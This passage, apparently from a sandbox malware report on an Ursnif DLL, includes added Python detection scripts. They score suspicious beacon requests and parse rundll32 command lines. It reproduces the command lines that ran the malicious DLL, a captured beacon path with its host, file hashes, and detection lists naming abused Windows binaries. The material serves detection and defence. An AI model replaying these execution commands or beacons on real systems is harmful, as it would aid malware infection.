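def path_extension(path: str) -> str:
    """Lower-cased extension of the last path segment, or '' if it has none."""
    last = path.rstrip("/").rsplit("/", 1)[-1]
    return "." + last.rsplit(".", 1)[1].lower() if "." in last else ""


def score_request(process: str, path: str, user_agent: str) -> Dict[str, object]:
    """Evaluate one request; signals are independent, 'suspicious' needs three of four."""
    segments = [seg for seg in path.split("/") if seg]
    joined = "".join(segments)
    signals = {
        "lolbin_process": process.lower().rsplit("\\", 1)[-1] in LOLBIN_PROCS,
        "legacy_user_agent": bool(LEGACY_UA.search(user_agent)),
        # Entropy alone is noisy on short paths, so gate it on segment count and length.
        "long_random_path": (
            len(segments) >= MIN_SEGMENTS
            and len(joined) >= MIN_PATH_CHARS
            and shannon_entropy(joined) >= MIN_ENTROPY_BITS
        ),
        "odd_extension": path_extension(path) in ODD_EXTS,
    }
    score = sum(1 for hit in signals.values() if hit)
    return {"signals": signals, "score": score, "suspicious": score >= 3}


def triage(records: List[Tuple[str, str, str, str]]) -> List[Dict[str, object]]:
    """Score (process, host, path, user_agent) records and return the suspicious ones."""
    hits = []
    for process, host, path, user_agent in records:
        result = score_request(process, path, user_agent)
        if result["suspicious"]:
            hits.append({"process": process, "host": host, "path": path, **result})
    return hits


# Constructed sample records: the first reproduces the rundll32.exe request
# from session 6 of the report, the second is a benign browser request.
BEACON_PATH = ("/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/"
               "p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/"
               "EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/"
               "2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre")
SAMPLE_RECORDS = [
    (r"C:\Windows\SysWOW64\rundll32.exe", "www.outlook.com", BEACON_PATH,
     "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe", "developer.mozilla.org",
     "/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RECORDS):
        print(hit["process"], hit["host"], hit["score"], hit["signals"])
```

Run as-is it prints the single flagged record. The 301/404 outcome is deliberately not a signal: a beacon that lands on a legitimate host and gets an error is still a beacon, and a detection keyed on the response would miss it.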


                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time:22:48:26
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                                                                                          Imagebase:0x1a0000
                                                                                          File size:893440 bytes
                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                          Imagebase:0x150000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:48:32
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:48:39
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:50:16
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:50:17
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:22:50:25
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
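
Every rundll32.exe instance above loads the sample from the user's Desktop, three by export name (BeGrass, Fieldeight, Often) and one by ordinal (#1). loaddll32.exe and the cmd.exe wrapper are the sandbox harness rather than attacker tooling, but the rundll32.exe command lines themselves are what process-creation telemetry (Sysmon event 1, EDR) records on a victim. The following Python is an added example and not part of the report: it parses a rundll32 command line into DLL path and entry point and flags DLLs loaded from user-writable directories, by ordinal, or with a non-.dll extension. The list of user-writable roots is an assumption for illustration; the parser accepts both the double quotes cmd.exe actually uses and the single quotes the report renders. The sample command lines are the four shown above plus one constructed benign invocation.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "rundll32[.exe] <dll>[,<entry>]": optional leading path and either quote
# style around the DLL (cmd.exe uses double quotes; the report shows single ones).
RUNDLL32_RE = re.compile(
    r"""^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+
        (?P<dll>"[^"]+"|'[^']+'|[^\s,]+)
        (?:\s*,\s*(?P<entry>\S+))?""",
    re.IGNORECASE | re.VERBOSE,
)

# Lower-cased markers of directories a standard user can write to (assumed list).
USER_WRITABLE_MARKERS = ("c:\\users\\", "\\appdata\\", "\\temp\\", "c:\\programdata\\")


@dataclass
class Rundll32Invocation:
    dll_path: str
    entry: str  # export name, "#N" ordinal, or "" when absent

    @property
    def is_ordinal(self) -> bool:
        return re.fullmatch(r"#\d+", self.entry) is not None

    @property
    def in_user_writable_dir(self) -> bool:
        p = self.dll_path.lower()
        return any(marker in p for marker in USER_WRITABLE_MARKERS)


def parse_rundll32(cmdline: str) -> Optional[Rundll32Invocation]:
    """Return the DLL and entry of a rundll32 command line, or None if it is not one."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    return Rundll32Invocation(m.group("dll").strip("\"'"), m.group("entry") or "")


def assess(cmdline: str) -> Dict[str, object]:
    """Score one process-creation command line; any single signal is enough to flag."""
    inv = parse_rundll32(cmdline)
    if inv is None:
        return {"rundll32": False, "suspicious": False}
    signals = {
        "user_writable_dll": inv.in_user_writable_dir,
        "ordinal_entry": inv.is_ordinal,
        "unusual_extension": not inv.dll_path.lower().endswith(".dll"),
    }
    return {
        "rundll32": True,
        "dll": inv.dll_path,
        "entry": inv.entry,
        "signals": signals,
        "suspicious": any(signals.values()),
    }


def flag_suspicious(cmdlines: List[str]) -> List[str]:
    """Return the command lines assess() considers suspicious, in input order."""
    return [c for c in cmdlines if assess(c)["suspicious"]]


# The four rundll32.exe command lines from the report plus a constructed benign one.
SAMPLE_CMDLINES = [
    r"rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass",
    r"rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1",
    r"rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight",
    r"rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often",
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(assess(c), c)
```

Note that the parser looks only at the process's own command line, so the cmd.exe wrapper line ("cmd.exe /C rundll32.exe ...") is reported as not-rundll32; the child rundll32.exe event is the one to match. A bare DLL name such as shell32.dll is resolved through the loader search order and is not flagged here, which is a gap a production rule should close by joining on the loaded image path.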

                                                                                          Disassembly

                                                                                          Code Analysis
